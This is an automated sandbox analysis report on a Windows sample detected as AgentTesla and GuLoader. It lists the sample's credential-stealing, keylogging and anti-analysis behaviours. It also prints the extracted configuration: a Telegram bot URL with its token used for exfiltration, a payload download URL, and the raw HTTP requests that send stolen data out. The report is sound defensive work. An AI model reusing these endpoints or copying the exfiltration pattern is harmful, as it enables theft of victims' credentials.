Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.generic.ml.22865.exe

Overview

General Information

Sample Name:SecuriteInfo.com.generic.ml.22865.exe
Analysis ID:634596
MD5:deb3e51a2d7d566c86b22046c1058f1a
SHA1:a780f7bbf2255a7dcd963c80fad20ee164ca6b93
SHA256:4b4bb7b5e2fbe3814fca75d1ab132a97c67255ebfe6dc4f3312d64483a181286
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Tries to steal Mail credentials (via file / registry access)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • SecuriteInfo.com.generic.ml.22865.exe (PID: 6932 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe" MD5: DEB3E51A2D7D566C86B22046C1058F1A)
    • CasPol.exe (PID: 2696 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "Telegram", "Chat id": "1570476458", "Chat URL": "https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument"}
{"Payload URL": "http://www.fides-kenya.com/yem/wam.bin"}
{"C2 url": "https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000004.00000000.9599862786.0000000000F00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000001.00000002.9740495232.00000000032A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000000.9599862786.0000000000F00000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://www.fides-kenya.com/yem/wam.bin"}
            Source: SecuriteInfo.com.generic.ml.22865.exe.6932.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1570476458", "Chat URL": "https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument"}
            Source: CasPol.exe.2696.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendMessage"}
            Source: SecuriteInfo.com.generic.ml.22865.exeVirustotal: Detection: 8%Perma Link
            Source: SecuriteInfo.com.generic.ml.22865.exeReversingLabs: Detection: 19%
            Source: SecuriteInfo.com.generic.ml.22865.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49753 version: TLS 1.2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\spndingsfejlenJump to behavior
            Source: SecuriteInfo.com.generic.ml.22865.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: MpCommu.pdb source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr
            Source: Binary string: MpCommu.pdbUGP source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_0040290B FindFirstFileW,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: Malware configuration extractorURLs: http://www.fides-kenya.com/yem/wam.bin
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: POST /bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3f25989d6468Host: api.telegram.orgContent-Length: 1004Expect: 100-continueConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /yem/wam.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.fides-kenya.comCache-Control: no-cache
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CasPol.exe, 00000004.00000002.14467253332.000000001D621000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.9740041211.000000001C441000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14468117275.000000001D6D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://V58nqJBvA8Uitwi1EyuW.com
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: network-server.png.1.drString found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
            Source: CasPol.exe, 00000004.00000002.14475025923.000000001FD16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000004.00000002.14475025923.000000001FD16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
            Source: CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hqQZjN.com
            Source: SecuriteInfo.com.generic.ml.22865.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, SourceCodePro-Black.otf.1.drString found in binary or memory: http://scripts.sil.org/OFLSource
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://www.avast.com0/
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: CasPol.exe, 00000004.00000002.14444614539.000000000112B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fides-kenya.com/yem/wam.bin
            Source: CasPol.exe, 00000004.00000002.14467843631.000000001D698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: CasPol.exe, 00000004.00000002.14444961038.0000000001165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
            Source: CasPol.exe, 00000004.00000002.14467843631.000000001D698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument
            Source: CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocumentdocument-----
            Source: CasPol.exe, 00000004.00000002.14472003206.000000001DA5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000004.00000002.14471972041.000000001DA5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000004.00000002.14471972041.000000001DA5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000004.00000002.14471972041.000000001DA5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000004.00000002.14472003206.000000001DA5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, lang-1034.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: CasPol.exe, 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: www.fides-kenya.com
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D3CA09A recv,
            Source: global trafficHTTP traffic detected: GET /yem/wam.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.fides-kenya.comCache-Control: no-cache
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000004.00000002.14467253332.000000001D621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000004.00000002.14472495479.000000001DAD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"Ch
            Source: unknownHTTP traffic detected: POST /bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da3f25989d6468Host: api.telegram.orgContent-Length: 1004Expect: 100-continueConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49753 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_00406D5F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_716A1BFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BF503
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032C0976
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032C173F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B735D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B43E8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B43EC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B73F8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B9FF0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B723D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B4608
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA606
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B721A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA263
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B9A77
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B9A45
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032C2E99
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B9ACC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B72C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B4570
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA144
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA5A5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA030
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B9C37
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032BA05B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B608F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B608D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B60EA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B44FB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeCode function: 1_2_032B9CCB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D4A83D0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D4AB6A8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1D4A9AAC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_1FF11B80
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_2035AB28
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_20350070
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_2035E140
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_2035D8A8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_20355AE8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_2035A608
            Source: SecuriteInfo.com.generic.ml.22865.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: security.dll
            Source: libfreetype-6.dll.1.drStatic PE information: Number of sections : 12 > 10
            Source: libpcre-1.dll.1.drStatic PE information: Number of sections : 11 > 10
            Source: SecuriteInfo.com.generic.ml.22865.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
